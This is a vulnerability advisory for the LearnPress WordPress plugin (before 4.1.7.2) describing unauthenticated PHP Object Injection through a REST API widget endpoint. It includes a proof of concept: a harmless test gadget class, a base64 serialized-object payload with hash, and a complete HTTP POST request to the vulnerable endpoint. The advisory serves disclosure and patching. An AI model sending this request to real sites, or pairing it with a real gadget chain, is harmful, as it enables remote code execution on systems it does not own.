WordPress Plugin Vulnerabilities
LearnPress < 4.1.7.2 - Unauthenticated PHP Object Injection via REST API
Description
The plugin unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget is present, leadint to remote code execution (RCE). To successfully exploit this vulnerability attackers must have knowledge of the site secrets, allowing them to generate a valid hash via the wp_hash() function.
Proof of Concept
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
payload: {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
- instance is base64 encode of serialized object: O:4:"Evil":0:{};
- hash is caculated by: wp_hash(base64_decode($instance ))
POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123
{"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"} Affects Plugins
Fixed in version 4.1.7.2
References
Classification
Miscellaneous
Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-10-05 (about 3 months ago)
Added
2022-10-05 (about 3 months ago)
Last Updated
2022-10-05 (about 3 months ago)